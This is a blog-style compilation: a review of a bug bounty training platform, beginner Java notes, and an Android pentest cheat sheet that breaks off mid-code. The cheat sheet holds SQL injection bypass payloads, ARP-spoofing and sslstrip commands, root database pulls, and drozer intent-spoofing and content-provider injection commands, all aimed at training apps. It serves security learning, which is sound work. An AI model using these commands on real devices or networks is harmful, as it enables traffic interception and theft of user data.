Bug Bounty Hunter Review

Introduction

Bug Bounty Hunter is a platform which provides real-world web application challenges based on real bug bounty findings.

Description

On the evening of June 3, 2021, I was exchanging my BTC, about to buy the subscription to bugbountyhunter.com. Unfortunately my money was not enough to buy it, because I had exchanged for the fixed price. I needed to exchange more, but it takes almost an hour. I knew that bugbountyhunter.com only opens its membership for a short time. So, I DM'd Zseano, who is the founder of bugbountyhunter.com, to open a subscription for a couple of days. He told me that it won't ever close and also said today is my lucky day. Yes, he definitely made my day. I really thank Z for giving me this opportunity to join the awesome platform.

Labs

This is not the first lab that I bought. I bought Pentester Academy in the past as well, and also bought PentesterLab in the same month as Bug Bounty Hunter. Compared to the others, it is just different. It makes you feel like you're hunting on a real target. If you find a bug, you need to write a report with detailed observations of the bug and the mitigation as well.

Hackevents

The one thing that I like about bugbountyhunter.com is that they have a virtual live hacking event where you can earn bounties for your findings if you are level 2. You actually get paid for what you've done. That is a really good thing.

Reports

You can read all the reports from the past virtual live hacking event, FirstBlood, even if you're not a member of Bug Bounty Hunter. There is a ton of free challenges and material that you can learn from on Bug Bounty Hunter at no cost.

FirstBlood Disclosed Reports : https://www.bugbountyhunter.com/hackevents/firstblood

Hackerone Disclosed Reports: https://www.bugbountyhunter.com/disclosed/

Zseano’s methodology: https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf

Summary

Bug Bounty Hunter is a starting point for anyone who wants to learn bug bounty hunting through hands-on web application challenges and report writing. It covers everything you need as a beginner bug bounty hunter, from finding bugs to writing a good report. If you are looking to get started with bug bounties or want to become a better security researcher, then sign up for a membership at https://www.bugbountyhunter.com; it is fantastic value for what you will learn, and it will pay for itself when you find that first bug in a Bug Bounty Hunter virtual live hacking event or on other platforms. Zseano is a great guy in the community and he gave his book away for free as well. Support his work by signing up for a membership on Bug Bounty Hunter.

Java Notes

Description

These are the notes that I took while I was learning Java.

Primitive Types

Type     Bytes  Range

byte     1      [-128, 127]
short    2      [-32K, 32K]
int      4      [-2B, 2B]
long     8
float    4
double   8
char     2      A, B, C, ...
boolean  1      true/false

Declaring primitive type variables in Java

Primitive types are used for simple values.

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        byte age = 30;
        long viewsCount = 3_123_456_789L; // L suffix marks a long literal
        float price = 10.99F;             // F suffix marks a float literal
        char letter = 'A';                // single quotes for a char
        boolean isEligible = false;
    }
}

Primitive types are copied by value.

Declaring reference type variables in Java

Reference types are used for complex objects.

package com.osibyte;

import java.util.Date;

public class Main {

    public static void main(String[] args) {
        byte age = 30;
        Date now = new Date();
        System.out.println(now);
    }
}

Reference types are copied by reference: both variables point to the same object.

package com.osibyte;

import java.awt.*;

public class Main {

    public static void main(String[] args) {
        Point point1 = new Point(1, 1);
        Point point2 = point1; // point2 refers to the same object as point1
        point1.x = 2;
        System.out.println(point2);
    }
}

Result:

java.awt.Point[x=2,y=1]

Escape Sequences

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        String message1 = "Hello \"chan\"";
        String message2 = "C:\\Users\\administrator\\flag";
        System.out.println(message1);
        System.out.println(message2);
    }
}

Arrays

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
        int[] numbers = new int[5];
        numbers[0] = 1;
        numbers[1] = 2;
        System.out.println(Arrays.toString(numbers));
    }
}

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int[] numbers = { 2, 3, 5, 1, 4 };
        System.out.println(numbers.length);
    }
}

Sorting arrays

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
        int[] numbers = { 2, 4, 5, 1, 3 };
        Arrays.sort(numbers);
        System.out.println(Arrays.toString(numbers));
    }
}

Multidimensional Arrays

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
        int[][] numbers = new int[2][3];
        numbers[0][0] = 1;
        System.out.println(Arrays.deepToString(numbers));
    }
}

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
        int[][] numbers = { { 1, 2, 3 }, { 4, 5, 6 } };
        numbers[0][0] = 1;
        System.out.println(Arrays.deepToString(numbers));
    }
}

Arithmetic Expressions

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int adding = 10 + 3;
        double division = (double) 10 / (double) 3;
        int x = 1;
        x++;
        System.out.println(adding);
        System.out.println(division);
        System.out.println(x);
    }
}

Order Of Operations

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int x = (10 + 3) * 2;
        System.out.println(x);
    }
}

Casting

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        // Implicit (widening) casting happens automatically along this chain:
        // byte > short > int > long > float > double
        // Going the other way (narrowing) needs an explicit cast:
        double x = 1.1;
        int y = (int) x + 2;
        System.out.println(y);
    }
}

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        // A String cannot be cast to a number; parse it with the wrapper class instead
        String x = "1";
        int y = Integer.parseInt(x) + 2;
        System.out.println(y);
    }
}

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        // The same for floating-point values
        String x = "1.1";
        double y = Double.parseDouble(x) + 2;
        System.out.println(y);
    }
}

Formatting numbers

Currency

package com.osibyte;

import java.text.NumberFormat;

public class Main {

    public static void main(String[] args) {
        NumberFormat currency = NumberFormat.getCurrencyInstance();
        String result = currency.format(123456.891);
        System.out.println(result);
    }
}

Percent

package com.osibyte;

import java.text.NumberFormat;

public class Main {

    public static void main(String[] args) {
        NumberFormat percent = NumberFormat.getPercentInstance();
        String result = percent.format(0.1);
        System.out.println(result);
    }
}

Another method for percent

package com.osibyte;

import java.text.NumberFormat;

public class Main {

    public static void main(String[] args) {
        String result = NumberFormat.getPercentInstance().format(0.1);
        System.out.println(result);
    }
}

Reading Input

Byte

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        System.out.print("Age: ");
        byte age = scanner.nextByte();
        System.out.println("You are " + age);
    }
}

Name

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        System.out.print("What is your name?: ");
        String name = scanner.nextLine();
        System.out.println("My name is " + name);
    }
}

Mortgage Calculator

Sample run:

Principal: 10000
Annual Interest Rate: 3.92
Period (Years): 30
Mortgage:

package com.osibyte;

import java.text.NumberFormat;
import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        final byte months = 12;
        final byte percent = 100;

        Scanner scanner = new Scanner(System.in);

        System.out.print("Principal: ");
        int principal = scanner.nextInt();

        System.out.print("Annual Interest Rate: ");
        float rate = scanner.nextFloat();
        float monthlyInterest = rate / percent / months;

        System.out.print("Period (Years): ");
        byte years = scanner.nextByte();
        int numberOfPayments = years * months;

        double mortgage = principal
                * (monthlyInterest * Math.pow(1 + monthlyInterest, numberOfPayments)
                / (Math.pow(1 + monthlyInterest, numberOfPayments) - 1));

        String mortgageFormatted = NumberFormat.getCurrencyInstance().format(mortgage);
        System.out.println("Mortgage: " + mortgageFormatted);
    }
}

Control Flow

  • Comparison Operators
  • Logical Operators
  • Conditional statements
  • Loops

Comparison Operators

Used to compare primitive values:

==  !=  >  >=  <  <=

Logical Operators

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int temp = 22;
        boolean isWarm = temp > 20 && temp < 30;
        System.out.println(isWarm);
    }
}

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        boolean hasHighIncome = true;
        boolean hasGoodGrade = true;
        boolean hasCriminalRecord = false;
        boolean isEligible = (hasHighIncome || hasGoodGrade) && !hasCriminalRecord;
        System.out.println(isEligible);
    }
}

If Statements

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int temp = 32;
        if (temp > 30) {
            System.out.println("It's a hot day");
            System.out.println("Drink Water");
        }
        else if (temp > 20)
            System.out.println("Beautiful Day");
        else
            System.out.println("Cold Day");
    }
}

Simplifying If Statements

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int income = 120_000;
        boolean hasHighIncome = (income > 100_000);
    }
}

The Ternary Operator

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        int income = 120_000;
        String className = income > 100_000 ? "First" : "Economy";
        System.out.println(className);
    }
}

Switch Statements

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        String role = "admin";

        switch (role) {
            case "admin":
                System.out.println("You are admin");
                break;

            case "moderator":
                System.out.println("You are a moderator");
                break;

            default:
                System.out.println("You are a guest");
        }

        // Equivalent if/else chain; compare strings with equals(), not ==
        if (role.equals("admin"))
            System.out.println("You are admin");
        else if (role.equals("moderator"))
            System.out.println("You are a moderator");
        else
            System.out.println("You are a guest");
    }
}

FizzBuzz

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        System.out.print("Numbers: ");
        int number = scanner.nextInt();

        if (number % 5 == 0 && number % 3 == 0)
            System.out.println("FizzBuzz");
        else if (number % 3 == 0)
            System.out.println("Buzz");
        else if (number % 5 == 0)
            System.out.println("Fizz");
        else
            System.out.println(number);
    }
}

for loops

for (int i = 0; i < 5; i++) // basic structure of for loop

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        for (int i = 0; i < 5; i++)
            System.out.println("hello World");
    }
}

While loops

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        for (int i = 5; i > 0; i--)
            System.out.println("hello World" + i);

        // Same countdown as a while loop; i must start at 5, otherwise the body never runs
        int i = 5;
        while (i > 0) {
            System.out.println("hello World" + i);
            i--;
        }
    }
}

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        String input = "";
        Scanner scanner = new Scanner(System.in);
        while (!input.equals("quit")) {
            System.out.print("Input: ");
            input = scanner.next().toLowerCase();
            System.out.println(input);
        }
    }
}

Do while loops

A do-while loop always executes its body at least once, because the condition is checked after the body.

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        String input = "";
        Scanner scanner = new Scanner(System.in);
        while (!input.equals("quit")) {
            System.out.print("Input: ");
            input = scanner.next().toLowerCase();
            System.out.println(input);
        }
        do {
            System.out.print("Input: ");
            input = scanner.next().toLowerCase();
            System.out.println(input);
        } while (!input.equals("quit"));
    }
}

Break and continue

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        String input = "";
        while (true) {
            System.out.print("Input: ");
            input = scanner.next().toLowerCase();
            if (input.equals("pass"))
                continue;
            if (input.equals("quit"))
                break;
            System.out.println(input);
        }
    }
}

For Each Loop

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        String[] fruits = { "Apple", "Mango", "Orange" };

        for (int i = 0; i < fruits.length; i++)
            System.out.println(fruits[i]);
        for (String fruit : fruits)
            System.out.println(fruit);
    }
}

Mortgage Calculator

package com.osibyte;

import java.text.NumberFormat;
import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
        final byte months = 12;
        final byte percent = 100;

        int principal = 0;

        Scanner scanner = new Scanner(System.in);

        System.out.println("Enter a number between 1,000 and 1,000,000");
        while (true) {
            System.out.print("Principal ($1K - $1M): ");
            principal = scanner.nextInt();
            if (principal >= 1000 && principal <= 1_000_000)
                break;
            System.out.println("Enter a number between 1,000 and 1,000,000");
        }

        float rate = 0;
        float monthlyInterest = 0;

        while (true) {
            System.out.print("Annual Interest Rate: ");
            rate = scanner.nextFloat();
            monthlyInterest = rate / percent / months;
            if (rate > 0 && rate <= 30)
                break;
            System.out.println("Enter a value greater than 0 and less than or equal 30");
        }

        System.out.print("Period (Years): ");
        byte years = scanner.nextByte();
        int numberOfPayments = years * months;

        double mortgage = principal
                * (monthlyInterest * Math.pow(1 + monthlyInterest, numberOfPayments)
                / (Math.pow(1 + monthlyInterest, numberOfPayments) - 1));

        String mortgageFormatted = NumberFormat.getCurrencyInstance().format(mortgage);
        System.out.println("Mortgage: " + mortgageFormatted);
    }
}
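The range checks above still crash with an InputMismatchException as soon as someone types something that is not a number, because nextInt() and nextFloat() cannot parse it. As an added example (my own code, not the notes'), here is the same calculator with the reading loop factored into a method that discards bad tokens and re-prompts; the class and method names are my own choice.

```java
import java.text.NumberFormat;
import java.util.InputMismatchException;
import java.util.Locale;
import java.util.Scanner;

// Added example: the notes' mortgage formula with input handling that survives
// non-numeric input instead of throwing InputMismatchException.
public class MortgageCalculator {
    static final byte MONTHS_IN_YEAR = 12;
    static final byte PERCENT = 100;

    // Same formula as in the notes, pulled into a method so it can be reused and tested.
    static double calculateMortgage(int principal, float annualRate, byte years) {
        float monthlyInterest = annualRate / PERCENT / MONTHS_IN_YEAR;
        int numberOfPayments = years * MONTHS_IN_YEAR;
        return principal
                * (monthlyInterest * Math.pow(1 + monthlyInterest, numberOfPayments)
                / (Math.pow(1 + monthlyInterest, numberOfPayments) - 1));
    }

    // Keeps prompting until the user types a number within [min, max].
    static double readNumber(Scanner scanner, String prompt, double min, double max) {
        while (true) {
            System.out.print(prompt);
            try {
                double value = scanner.nextDouble();
                if (value >= min && value <= max)
                    return value;
                System.out.println("Enter a value between " + min + " and " + max);
            } catch (InputMismatchException e) {
                // nextDouble() leaves the offending token in the buffer; discard it,
                // otherwise the next call fails on the same input forever
                scanner.next();
                System.out.println("Enter a numeric value");
            }
        }
    }

    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        scanner.useLocale(Locale.US); // "3.92" must parse the same way on every machine

        int principal = (int) readNumber(scanner, "Principal ($1K - $1M): ", 1000, 1_000_000);
        // A rate of exactly 0 would make the formula divide by zero, so the lower bound is 0.01
        float rate = (float) readNumber(scanner, "Annual Interest Rate: ", 0.01, 30);
        byte years = (byte) readNumber(scanner, "Period (Years): ", 1, 30);

        double mortgage = calculateMortgage(principal, rate, years);
        System.out.println("Mortgage: " + NumberFormat.getCurrencyInstance().format(mortgage));
    }
}
```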

Android Pentest Cheat Sheet

Description

These are the notes that I took while I was learning Android pentesting. Will update with some methodology soon!

Applications

  • home
  • dialer
  • sms/mms
  • IM
  • browser
  • camera
  • alarm
  • calculator
  • contacts
  • voice
  • dial
  • email
  • calendar
  • media player
  • photo
  • album
  • clock

APPLICATION FRAMEWORK

  • Activity Manager
  • Window Manager
  • Content Providers
  • View System
  • Notification Manager
  • Package Manager
  • Telephony Manager
  • Resource Manager
  • Location Manager

LIBRARIES

  • Surface Manager
  • Media Framework
  • SQLite
  • WebKit
  • libc
  • OpenGL ES
  • Audio Manager
  • FreeType
  • SSL

Hardware Abstraction Layer

  • Graphics
  • Audio
  • Camera
  • Bluetooth
  • GPS
  • Radio (RIL)
  • Wi-Fi

Linux Kernel

  • Display Driver
  • Camera Driver
  • Bluetooth Driver
  • Shared Memory Driver
  • Binder (IPC) Driver
  • USB Driver
  • Kernel Driver
  • Wi-Fi Driver
  • Audio Drivers
  • Power Management

Common Mobile Application Functions

  • Online Banking (Barclays)
  • Shopping (Amazon)
  • Social Network (Facebook)
  • Streaming (Sky Go)
  • Gambling (Betfair)
  • Instant Messaging (WhatsApp)
  • Voice Chat (Skype)
  • Email (Gmail)
  • File sharing (Dropbox)
  • Games (Angry Birds)

Document storage applications allowing users to access sensitive business documents on demand.

Travel and expenses applications allowing users to create, store and upload expenses to internal systems.

HR applications allowing users to access payroll, time slips, holiday information and other sensitive functionality.

Internal service applications, such as mobile applications that have been optimised to provide an internal resource such as the corporate intranet.

Internal instant messaging applications allowing users to chat in real time with other users regardless of location.

Client-Side Vulnerabilities

Insecure data storage

This category of vulnerability incorporates the various defects that lead to an application storing data on the mobile device in cleartext or in an obfuscated format, using a hard-coded key, or by any other means that can be trivially reversed by an attacker.

Insecure transmission of data

This involves any instance whereby an application does not use transport layer encryption to protect data in transit. It also includes cases where transport layer encryption is used but has been implemented in an insecure manner.

Lack of binary protections

This flaw means that an application does not employ any form of protection mechanism to complicate reverse engineering, malicious tampering or debugging.

Client-side injection

This category of vulnerability describes scenarios where untrusted data is sent to an application and handled in an unsafe manner. Typical origins of injection include other applications on the device and input populated into the application from the server.

Hard-coded passwords and keys

This flaw arises when the developer embeds a sensitive piece of information, such as a password or an encryption key, into the application.

Leakage of sensitive data

This involves cases where an application unintentionally leaks sensitive data through a side channel. This specifically includes data leakage that arises through the use of a framework or the OS and occurs without the developer's knowledge.

OWASP Mobile Top 10 risks from 2014

  • M1 – Weak Server-Side Controls
  • M2 – Insecure Data Storage
  • M3 – Insufficient Transport Layer Protection
  • M4 – Unintended Data Leakage
  • M5 – Poor Authorization and Authentication
  • M6 – Broken Cryptography
  • M7 – Client Side Injection
  • M8 – Security Decisions via Untrusted Inputs
  • M9 – Improper Session Handling
  • M10 – Lack of Binary Protections

OWASP Mobile Top 10 risks from 2016

  • M1 – Improper Platform Usage
  • M2 – Insecure Data Storage
  • M3 – Insecure Communication
  • M4 – Insecure Authentication
  • M5 – Insufficient Cryptography
  • M6 – Insecure Authorization
  • M7 – Client Code Quality
  • M8 – Code Tampering
  • M9 – Reverse Engineering
  • M10 – Extraneous Functionality

OWASP Top 10 mobile security tools

  • iMAS – Created by the MITRE Corporation, this project is an open source secure application framework for iOS
  • GoatDroid – self‐contained training environment for Android applications.
  • iGoat – Similar to the goatdroid project
  • Damn Vulnerable IOS
  • MobiSec
  • Androick

Browser-based applications – The term describes applications that are usually a "mobile friendly" clone of the main site and are loaded via the device's browser.

Hybrid applications – The term refers to mobile applications that are a native wrapper around a WebView and often use a framework to access native device functionality.

Application Sandboxing

Each app runs inside its own sandbox.
One app cannot access the data associated with other apps.
/data/data/ is the directory where all app data is located.

Connecting to adb with BlueStacks

adb connect localhost:5555
adb -s emulator-5554 shell

Working through the OWASP Mobile Top 10 from 2014

M2 – Insecure Data Storage

Android provides various ways to save app data.

It is up to the developer what kind of data is saved, how much, and so on:

  • SharedPreferences
  • SQLite databases
  • Internal storage
  • External storage
  • Over a network connection

SharedPreferences

Saving a username and password without encryption is not safe; anyone with access to the app's data directory can read them:

OnePlus3T:/data/data/com.ist.challenge3/shared_prefs # cat userdetails.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">ist</string>
    <string name="password">ist</string>
</map>
OnePlus3T:/data/data/com.ist.challenge3/shared_prefs #
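A quick way to triage every shared_prefs file you pull from a device is to scan them for credential-like keys. The audit helper below is an added example (my own code, not from the notes or the challenge app); it parses a shared_prefs XML dump with the JDK's built-in parser and reports entries whose key name suggests a secret, and the sample input is constructed after the userdetails.xml dump above.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

// Added audit helper: flags credential-like keys stored in cleartext in a
// shared_prefs XML file, e.g. one pulled with
//   adb pull /data/data/<package>/shared_prefs/<file>.xml
public class SharedPrefsAudit {
    // Key names that usually mean a secret is being persisted; extend to taste.
    private static final String[] SENSITIVE_KEYS = {
        "password", "passwd", "pwd", "token", "secret", "apikey", "api_key", "pin_code"
    };

    static List<String> findCleartextSecrets(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // The dump came off a device, so treat it as untrusted input: no DTDs, no entity expansion
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setExpandEntityReferences(false);
        Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));

        List<String> findings = new ArrayList<>();
        NodeList entries = doc.getDocumentElement().getChildNodes(); // children of <map>
        for (int i = 0; i < entries.getLength(); i++) {
            if (!(entries.item(i) instanceof Element)) continue; // skip whitespace text nodes
            Element entry = (Element) entries.item(i);
            String key = entry.getAttribute("name");
            // <string> keeps its value as text content; int/long/boolean/float use a value attribute
            String value = "string".equals(entry.getTagName())
                    ? entry.getTextContent() : entry.getAttribute("value");
            if (value.isEmpty()) continue;
            String lowered = key.toLowerCase(Locale.ROOT);
            for (String sensitive : SENSITIVE_KEYS) {
                if (lowered.contains(sensitive)) {
                    findings.add("<" + entry.getTagName() + " name=\"" + key
                            + "\"> holds a value in cleartext (" + value.length() + " chars)");
                    break;
                }
            }
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample modelled on the userdetails.xml dump shown above
        String sample = "<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n"
                + "<map>\n"
                + "    <string name=\"username\">ist</string>\n"
                + "    <string name=\"password\">ist</string>\n"
                + "    <boolean name=\"remember_me\" value=\"true\" />\n"
                + "</map>\n";
        for (String finding : findCleartextSecrets(sample))
            System.out.println(finding);
    }
}
```

A hit only says the key looks sensitive; confirm by reading the value, since a properly hashed or Keystore-encrypted value would also match. The fix on the app side is to not persist the password at all (keep a server-issued session token instead) and to encrypt anything that must stay on the device with a key held in the Android Keystore.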

SQLite databases

Reading a database file over adb (requires root on the device):

adb shell "su -c cat /data/data/com.ist.challenge4/databases/SQLINJECTION.db" > SQLINJECTION.db

M3 – Insufficient Transport Layer Protection

It is pretty common to exchange data between the client and server.
Many apps do not use SSL for transmitting data.
Many apps trust self-signed certificates.
It is recommended to use certificates signed by a trusted CA.
An attacker may eavesdrop to get sensitive data.

There are many possible attack scenarios. Below are a few of them:

  • MITM with Burpsuite – Intercepting HTTP Traffic
  • MITM with Burpsuite – Intercepting SSL Traffic
  • Real world MITM attacks with arp spoofing
  • Passive data analysis with tcpdump and wireshark

MITM with Burpsuite – Intercepting HTTP Traffic

Configure the proxy server for BlueStacks:

cd to the BlueStacks folder

C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe set 192.168.189.1 8080 connect to specified proxy
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe reset                   reset/stop using proxy

Vulnerable url – http://demo.testfire.net/login.jsp
SQLi payload:

x' or 'x'='x

MITM with Burpsuite – Intercepting SSL Traffic

The only extra step is installing Burp's CA certificate on the device so that the app trusts the intercepting proxy.

Real World MITM attacks with arp spoofing

echo "1" > /proc/sys/net/ipv4/ip_forward

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

sudo sslstrip.py -l <listenPort>

sudo arpspoof -i <interface> -t <targetip> <gateway>

M4-Unintended Data Leakage

When an application processes sensitive information taken as input from the user or any other source, it may end up placing that data in an insecure location on the device. This insecure location could be accessible to other, malicious apps running on the same device, thus leaving the device at serious risk.

  • URL Caching(Both Request and response)
  • Keyboard Press Caching
  • Copy/Paste Buffer Caching
  • Application backgrounding
  • Logging
  • HTML5 data storage
  • Browser cookie objects
  • Analytics data sent to 3rd parties

Unintended Data Leakage — Reading the clipboard

The app pastes whatever you copied, from anywhere, so anything placed on the clipboard (such as a password copied from another app) is exposed to it.

That is the problem.

Unintended Data Leakage — Logging

Using logcat from adb:

adb logcat | grep password

M5 – Poor Authentication and Authorization

It comes in various forms of attack vectors.

Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app's code.

But it is always recommended to do all the processing on the server side and then load the data onto the mobile device.

Due to usability requirements, mobile apps allow passwords that are 4 digits long.

They can easily be brute forced.

Even if the passwords are stored as hashes on the server, an attacker can easily crack them using rainbow table attacks if the file where the hashes are stored is compromised.

M6 – Broken Cryptography

The mobile app uses encryption and decryption that is fundamentally flawed and can be exploited by the adversary to decrypt sensitive data.

Poor key management processes

Including the keys in the same attacker-readable directory as the encrypted content.

Avoid the use of hard-coded keys within the binary.

Creating custom encryption protocols

Use apktool to decompile the app and look through the source for hard-coded keys or hashes; if a hash can be cracked, the app is vulnerable to broken cryptography.

M7 – Client-Side Attack — SQL Injection on the Client Side

x' or 'x'='x

This can easily bypass the login without a valid username and password.

M7-Frame Injection in webviews

<iframe src="http://info.cern.ch/">

M8 – Security Decisions via Untrusted Inputs — Intent Spoofing

The mobile application can accept data from all kinds of sources.
am – activity manager
If an activity is exported (android:exported="true" in the manifest), any other app, or adb, can start it directly:

am start -n com.ist.challenge1/.Welcome

M9 – Improper Session Handling

Session-related attacks come into the picture if the session ID is compromised or not invalidated properly in the backend, if token creation is insecure, or if session timeouts are not implemented properly.

M10 – Lack of Binary Protections

  • Reversing Android apps with apktool
  • Reversing Android apps with dex2jar
  • Exploiting debuggable apps using JDB

Setting Up Drozer

Drozer is a framework for Android security assessments developed by MWR Labs.

Drozer allows you to assume the role of an Android app and to interact with other apps through Android's Inter-Process Communication (IPC) mechanism and the underlying operating system.

It has nice modules for things such as leaking content providers, SQL injection and LFI.

Set up port forwarding and connect:

adb -s emulator-5554 forward tcp:31415 tcp:31415
drozer console connect

Getting the list of all modules in drozer

dz> list

Getting the list of all packages installed

run app.package.list

To filter for a specific package:

run app.package.list -f challenge1

Getting package information

run app.package.info -a [package name]
dz> run app.package.info -a com.ist.challenge1
Package: com.ist.challenge1
  Application Label: Challenge1
  Process Name: com.ist.challenge1
  Version: 1.0
  Data Directory: /data/user/0/com.ist.challenge1
  APK Path: /data/app/com.ist.challenge1-2/base.apk
  UID: 10059
  GID: []
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - None
  Defines Permissions:
  - None

Finding out the attack surface

run app.package.attacksurface [package name]
dz> run app.package.attacksurface com.ist.challenge1
Attack Surface:
  2 activities exported
  0 broadcast receivers exported
  0 content providers exported
  0 services exported
    is debuggable

Listing out activities in a package

run app.activity.info -a [packagename]

Finding the content providers of a package

run scanner.provider.finduris -a [packagename]

Querying content providers

run app.provider.query [URI]

Inserting data into content providers

run app.provider.insert [URI] --[type] [column] [value]    (for example --string name value)

Intent Spoofing with drozer

First list the activities, then start the exported one directly:

dz> run app.activity.info -a com.ist.challenge1
Package: com.ist.challenge1
  com.ist.challenge1.MainActivity
    Permission: null
  com.ist.challenge1.Welcome
    Permission: null
dz> run app.activity.start --component com.ist.challenge1  com.ist.challenge1.Welcome

Exploiting Content Provider Leakage

Listing out activities in a package

run app.activity.info -a [package name]

Finding the content providers of a package, then listing its attack surface and the URIs that can be queried:

run scanner.provider.finduris -a [package name]
run app.package.list -f vul
dz> run app.package.attacksurface com.androidpentesting.vulcontentprovider
Attack Surface:
  1 activities exported
  0 broadcast receivers exported
  1 content providers exported
  0 services exported
    is debuggable
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails
Able to Query    content://com.androidpentesting.vulcontentprovider.data

Accessible content URIs:
  content://com.androidpentesting.vulcontentprovider.data/
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
  content://com.androidpentesting.vulcontentprovider.data
  content://com.androidpentesting.vulcontentprovider.data/userdetails
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
OnePlus3T:/ $ content query --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/
Row: 0 id=1, name=ch4n, bankdetails=ch4n
OnePlus3T:/ $

SQL Injection in a Content Provider

dz> run scanner.provider.injection --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/
Not Vulnerable:
  No non-vulnerable URIs found.

Injection in Projection:
  content://com.androidpentesting.vulcontentprovider.data/userdetails/

Injection in Selection:
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
dz>

Check whether the selection is injectable: a lone quote produces a SQLite syntax error, which shows the selection is concatenated straight into the query.

dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM users WHERE (')
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
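The error message above shows the root cause: the provider builds "SELECT * FROM users WHERE (" + selection + ")" from whatever the caller passes. As an added example (my own illustrative code, not the challenge app's), here is a provider written both ways, the vulnerable pattern beside the hardened one, covering both the exported-provider leakage and the injection findings; it assumes an Android project, the table name comes from the error message, the column names from the drozer output, and the package and class names are my own.

```java
package com.androidpentesting.vulcontentprovider; // hypothetical package, after the challenge app

import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import java.util.HashMap;
import java.util.Map;

// Illustrative provider, not the challenge app's code. Compile inside an Android project.
public class UserDetailsProvider extends ContentProvider {
    private static final String TABLE = "users"; // table name taken from the error message above
    // Allowlist of caller-visible columns (from the drozer output above) mapped to real columns
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static {
        PROJECTION_MAP.put("id", "id");
        PROJECTION_MAP.put("name", "name");
        PROJECTION_MAP.put("bankdetails", "bankdetails");
    }
    private SQLiteOpenHelper helper;

    @Override
    public boolean onCreate() {
        helper = new SQLiteOpenHelper(getContext(), "userdetails.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase db) {
                db.execSQL("CREATE TABLE " + TABLE
                        + " (id INTEGER PRIMARY KEY, name TEXT, bankdetails TEXT)");
            }
            @Override public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) { }
        };
        return true;
    }

    // VULNERABLE (the pattern drozer flagged): projection and selection are pasted into the SQL.
    // A selection consisting of a single quote yields exactly the error seen above:
    //   unrecognized token: "')" ... while compiling: SELECT * FROM users WHERE (')
    // and whatever the caller puts in the projection is executed as SQL too
    // ("Injection in Projection").
    Cursor queryVulnerable(String[] projection, String selection) {
        String columns = (projection == null) ? "*" : String.join(", ", projection);
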